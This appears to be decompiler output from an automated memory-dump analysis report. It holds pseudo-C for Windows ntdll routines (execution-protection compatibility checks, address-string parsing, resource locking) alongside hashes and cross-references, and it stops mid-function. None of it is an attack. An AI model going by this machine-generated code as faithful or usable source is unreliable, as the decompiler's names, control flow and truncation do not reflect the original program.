                                                                                                                                                      					}
                                                                                                                                                      					_push(_t62);
                                                                                                                                                      					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                      					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                      					_t52 = E01F80D27( &_v540, L"Execute=1");
                                                                                                                                                      					_t76 = _t75 + 0x1c;
                                                                                                                                                      					_push(_t62);
                                                                                                                                                      					__eflags = _t52;
                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                      						E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                      						_t71 =  &_v540;
                                                                                                                                                      						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                      						_t77 = _t76 + 0x14;
                                                                                                                                                      						_v552 = _t56;
                                                                                                                                                      						__eflags = _t71 - _t56;
                                                                                                                                                      						if(_t71 >= _t56) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L10:
                                                                                                                                                      							_t62 = E01F88375(_t71, 0x20);
                                                                                                                                                      							_pop(_t69);
                                                                                                                                                      							__eflags = _t62;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      								 *_t62 = 0;
                                                                                                                                                      							}
                                                                                                                                                      							E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                      							_t77 = _t77 + 0x10;
                                                                                                                                                      							E01FEE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                      							__eflags = _t62;
                                                                                                                                                      							if(_t62 == 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							_t31 = _t62 + 2; // 0x2
                                                                                                                                                      							_t71 = _t31;
                                                                                                                                                      							__eflags = _t71 - _v552;
                                                                                                                                                      							if(_t71 >= _v552) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                      					_push(3);
                                                                                                                                                      					_push(0x55);
                                                                                                                                                      					E01FC3F92();
                                                                                                                                                      					_t38 = 1;
                                                                                                                                                      					L2:
                                                                                                                                                      					return E01F7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t38 = 0;
                                                                                                                                                      				goto L2;
                                                                                                                                                      			}
                                                                                                                                                      0x01fce327
                                                                                                                                                      0x01fce329
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fce32f
                                                                                                                                                      0x01fce32f
                                                                                                                                                      0x01fce337
                                                                                                                                                      0x01fce33a
                                                                                                                                                      0x01fce33b
                                                                                                                                                      0x01fce33d
                                                                                                                                                      0x01fce33f
                                                                                                                                                      0x01fce341
                                                                                                                                                      0x01fce341
                                                                                                                                                      0x01fce34e
                                                                                                                                                      0x01fce353
                                                                                                                                                      0x01fce358
                                                                                                                                                      0x01fce35d
                                                                                                                                                      0x01fce35f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fce365
                                                                                                                                                      0x01fce365
                                                                                                                                                      0x01fce368
                                                                                                                                                      0x01fce36e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fce374
                                                                                                                                                      0x01fce32f
                                                                                                                                                      0x01fc3f75
                                                                                                                                                      0x01fc3f7a
                                                                                                                                                      0x01fc3f7c
                                                                                                                                                      0x01fc3f7e
                                                                                                                                                      0x01fc3f86
                                                                                                                                                      0x01fa7f39
                                                                                                                                                      0x01fa7f47
                                                                                                                                                      0x01fa7f47
                                                                                                                                                      0x01fa7f37
                                                                                                                                                      0x01fa7f37
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01FC3F12
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01FC3EC4
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01FC3F75
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01FC3F4A
                                                                                                                                                      • Execute=1, xrefs: 01FC3F5E
                                                                                                                                                      • ExecuteOptions, xrefs: 01FC3F04
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01FCE345
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01FCE2FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BaseDataModuleQuery
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 3901378454-484625025
                                                                                                                                                      • Opcode ID: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                      • Instruction ID: 216b5e0af3a9c1fd1a7cc64b7ca217f58f0a1682eac8ad1220b56b6de61a58a6
                                                                                                                                                      • Opcode Fuzzy Hash: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                      • Instruction Fuzzy Hash: E641EB71A4031EBADB20EE94DCC5FDA77BCAF14700F4005AEA105E6081EB73DB468BA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E01FB0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				char _t120;
                                                                                                                                                      				short _t121;
                                                                                                                                                      				void* _t128;
                                                                                                                                                      				intOrPtr* _t130;
                                                                                                                                                      				char _t132;
                                                                                                                                                      				short _t133;
                                                                                                                                                      				intOrPtr _t141;
                                                                                                                                                      				signed int _t156;
                                                                                                                                                      				signed int _t174;
                                                                                                                                                      				intOrPtr _t177;
                                                                                                                                                      				intOrPtr* _t179;
                                                                                                                                                      				intOrPtr _t180;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      
                                                                                                                                                      				_t179 = _a4;
                                                                                                                                                      				_t141 =  *_t179;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				if(_t141 == 0) {
                                                                                                                                                      					L41:
                                                                                                                                                      					 *_a8 = _t179;
                                                                                                                                                      					_t180 = _v24;
                                                                                                                                                      					if(_t180 != 0) {
                                                                                                                                                      						if(_t180 != 3) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      					}
                                                                                                                                                      					_t174 = _v32;
                                                                                                                                                      					if(_t174 == 0) {
                                                                                                                                                      						if(_v8 == 7) {
                                                                                                                                                      							goto L43;
                                                                                                                                                      						}
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					L43:
                                                                                                                                                      					if(_v16 != 1) {
                                                                                                                                                      						if(_v16 != 2) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                      						L47:
                                                                                                                                                      						if(_t174 != 0) {
                                                                                                                                                      							E01F88980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                      							_t116 = 8;
                                                                                                                                                      							E01F7DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					if(_t180 != 0) {
                                                                                                                                                      						if(_v12 > 3) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						_t120 = E01FB0CFA(_v28, 0, 0xa);
                                                                                                                                                      						_t183 = _t183 + 0xc;
                                                                                                                                                      						if(_t120 > 0xff) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                      						goto L47;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v12 > 4) {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					_t121 = E01FB0CFA(_v28, _t180, 0x10);
                                                                                                                                                      					_t183 = _t183 + 0xc;
                                                                                                                                                      					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                      					goto L47;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t123 = _v16;
                                                                                                                                                      						if(_t123 == 0) {
                                                                                                                                                      							goto L7;
                                                                                                                                                      						}
                                                                                                                                                      						_t108 = _t123 - 1;
                                                                                                                                                      						if(_t108 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						_t178 = _t141;
                                                                                                                                                      						if(E01FB06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                      							if(E01FB06BA(_t135, _t178) == 0 || E01FB0A5B(_t136, _t178) == 0) {
                                                                                                                                                      								if(_t141 != 0x3a) {
                                                                                                                                                      									if(_t141 == 0x2e) {
                                                                                                                                                      										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                      											goto L41;
                                                                                                                                                      										} else {
                                                                                                                                                      											_v24 = _v24 + 1;
                                                                                                                                                      											L27:
                                                                                                                                                      											_v16 = _v16 & 0x00000000;
                                                                                                                                                      											L28:
                                                                                                                                                      											if(_v28 == 0) {
                                                                                                                                                      												goto L20;
                                                                                                                                                      											}
                                                                                                                                                      											_t177 = _v24;
                                                                                                                                                      											if(_t177 != 0) {
                                                                                                                                                      												if(_v12 > 3) {
                                                                                                                                                      													L6:
                                                                                                                                                      													return 0xc000000d;
                                                                                                                                                      												}
                                                                                                                                                      												_t132 = E01FB0CFA(_v28, 0, 0xa);
                                                                                                                                                      												_t183 = _t183 + 0xc;
                                                                                                                                                      												if(_t132 > 0xff) {
                                                                                                                                                      													goto L6;
                                                                                                                                                      												}
                                                                                                                                                      												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                      												goto L20;
                                                                                                                                                      											}
                                                                                                                                                      											if(_v12 > 4) {
                                                                                                                                                      												goto L6;
                                                                                                                                                      											}
                                                                                                                                                      											_t133 = E01FB0CFA(_v28, 0, 0x10);
                                                                                                                                                      											_t183 = _t183 + 0xc;
                                                                                                                                                      											_v20 = _v20 + 1;
                                                                                                                                                      											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                      											goto L20;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                      									goto L41;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t130 = _t179 + 1;
                                                                                                                                                      									if( *_t130 == _t141) {
                                                                                                                                                      										if(_v32 != 0) {
                                                                                                                                                      											goto L41;
                                                                                                                                                      										}
                                                                                                                                                      										_v32 = _v8 + 1;
                                                                                                                                                      										_t156 = 2;
                                                                                                                                                      										_v8 = _v8 + _t156;
                                                                                                                                                      										L34:
                                                                                                                                                      										_t179 = _t130;
                                                                                                                                                      										_v16 = _t156;
                                                                                                                                                      										goto L28;
                                                                                                                                                      									}
                                                                                                                                                      									_v8 = _v8 + 1;
                                                                                                                                                      									goto L27;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_v12 = _v12 + 1;
                                                                                                                                                      								if(_v24 > 0) {
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								_a7 = 1;
                                                                                                                                                      								goto L20;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                      							L20:
                                                                                                                                                      							_t179 = _t179 + 1;
                                                                                                                                                      							_t141 =  *_t179;
                                                                                                                                                      							if(_t141 == 0) {
                                                                                                                                                      								goto L41;
                                                                                                                                                      							}
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						L7:
                                                                                                                                                      						if(_t141 == 0x3a) {
                                                                                                                                                      							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                      								goto L41;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t130 = _t179 + 1;
                                                                                                                                                      								if( *_t130 != _t141) {
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      								_v20 = _v20 + 1;
                                                                                                                                                      								_t156 = 2;
                                                                                                                                                      								_v32 = 1;
                                                                                                                                                      								_v8 = _t156;
                                                                                                                                                      								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                      								goto L34;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						L8:
                                                                                                                                                      						if(_v8 > 7) {
                                                                                                                                                      							goto L41;
                                                                                                                                                      						}
                                                                                                                                                      						_t142 = _t141;
                                                                                                                                                      						if(E01FB06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                      							if(E01FB06BA(_t124, _t142) == 0 || E01FB0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                      								goto L41;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t128 = 1;
                                                                                                                                                      								_a7 = 1;
                                                                                                                                                      								_v28 = _t179;
                                                                                                                                                      								_v16 = 1;
                                                                                                                                                      								_v12 = 1;
                                                                                                                                                      								L39:
                                                                                                                                                      								if(_v16 == _t128) {
                                                                                                                                                      									goto L20;
                                                                                                                                                      								}
                                                                                                                                                      								goto L28;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_a7 = 0;
                                                                                                                                                      							_v28 = _t179;
                                                                                                                                                      							_v16 = 1;
                                                                                                                                                      							_v12 = 1;
                                                                                                                                                      							goto L20;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t123 = _t108 == 1;
                                                                                                                                                      				if(_t108 == 1) {
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				_t128 = 1;
                                                                                                                                                      				goto L39;
                                                                                                                                                      			}

























                                                                                                                                                      0x01fdeac4
                                                                                                                                                      0x01fdeac4
                                                                                                                                                      0x01fb0bd0
                                                                                                                                                      0x01fb0bd0
                                                                                                                                                      0x01fb0bd4
                                                                                                                                                      0x01fb0bd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bdb
                                                                                                                                                      0x01fb0be0
                                                                                                                                                      0x01fdeb0e
                                                                                                                                                      0x01fb0a1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0a1a
                                                                                                                                                      0x01fdeb1a
                                                                                                                                                      0x01fdeb1f
                                                                                                                                                      0x01fdeb27
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb36
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb36
                                                                                                                                                      0x01fb0bea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bf6
                                                                                                                                                      0x01fb0c00
                                                                                                                                                      0x01fb0c03
                                                                                                                                                      0x01fb0c0b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c0b
                                                                                                                                                      0x01fdeaaa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0a15
                                                                                                                                                      0x01fb0bb6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bc6
                                                                                                                                                      0x01fb0bc6
                                                                                                                                                      0x01fb0bcb
                                                                                                                                                      0x01fb0c15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c1d
                                                                                                                                                      0x01fb0c20
                                                                                                                                                      0x01fb0c21
                                                                                                                                                      0x01fb0c24
                                                                                                                                                      0x01fb0c24
                                                                                                                                                      0x01fb0c26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c26
                                                                                                                                                      0x01fb0bcd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bcd
                                                                                                                                                      0x01fb0b89
                                                                                                                                                      0x01fb0b89
                                                                                                                                                      0x01fb0b90
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b96
                                                                                                                                                      0x01fb0a04
                                                                                                                                                      0x01fb0a04
                                                                                                                                                      0x01fb0b9a
                                                                                                                                                      0x01fb0b9a
                                                                                                                                                      0x01fb0b9b
                                                                                                                                                      0x01fb0b9f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0ba5
                                                                                                                                                      0x01fb0ac7
                                                                                                                                                      0x01fb0aca
                                                                                                                                                      0x01fdeacf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeade
                                                                                                                                                      0x01fdeade
                                                                                                                                                      0x01fdeae3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeaf3
                                                                                                                                                      0x01fdeaf6
                                                                                                                                                      0x01fdeaf7
                                                                                                                                                      0x01fdeafe
                                                                                                                                                      0x01fdeb01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb01
                                                                                                                                                      0x01fdeacf
                                                                                                                                                      0x01fb0ad0
                                                                                                                                                      0x01fb0ad4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0ada
                                                                                                                                                      0x01fb0ae6
                                                                                                                                                      0x01fb0c34
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c47
                                                                                                                                                      0x01fb0c49
                                                                                                                                                      0x01fb0c4a
                                                                                                                                                      0x01fb0c4e
                                                                                                                                                      0x01fb0c51
                                                                                                                                                      0x01fb0c54
                                                                                                                                                      0x01fb0c57
                                                                                                                                                      0x01fb0c5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c60
                                                                                                                                                      0x01fb0afb
                                                                                                                                                      0x01fb0afe
                                                                                                                                                      0x01fb0b02
                                                                                                                                                      0x01fb0b05
                                                                                                                                                      0x01fb0b08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b08
                                                                                                                                                      0x01fb0ae6
                                                                                                                                                      0x01fb0b44
                                                                                                                                                      0x01fb09f8
                                                                                                                                                      0x01fb09f8
                                                                                                                                                      0x01fb09f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeaa0
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID: .$:$:
                                                                                                                                                      • API String ID: 3965848254-2308638275
                                                                                                                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction ID: d13209b659a9bb27cee30bb6ce9ff40bd52df696b2ff62639c6f4e86e1835237
                                                                                                                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction Fuzzy Hash: 90A180B1D0070ADADB25CF5AC8856FFBBB9AF05304F28846AF542A7241DF329A41CB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E01FB0554(signed int _a4, char _a8) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int* _t49;
                                                                                                                                                      				signed int _t51;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				signed int _t61;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t66;
                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				signed int _t81;
                                                                                                                                                      				signed int _t84;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
									_push(_t144);
									_push(0);
									_t51 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01FB4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01FC3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01FF217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FC3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01FB3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
												_push(_t138);
												_push(0);
												_t58 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01FB4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01FF217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01FC3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01FB3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01F95384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01F6F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01FB3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01FB3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01FB3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
                                                                                                                                                      																	}
                                                                                                                                                      																	goto L59;
                                                                                                                                                      																}
                                                                                                                                                      																E01F95329(_t110, _t138);
                                                                                                                                                      																_t69 = E01F953A5(_t138, 1);
                                                                                                                                                      																return _t69;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											} else {
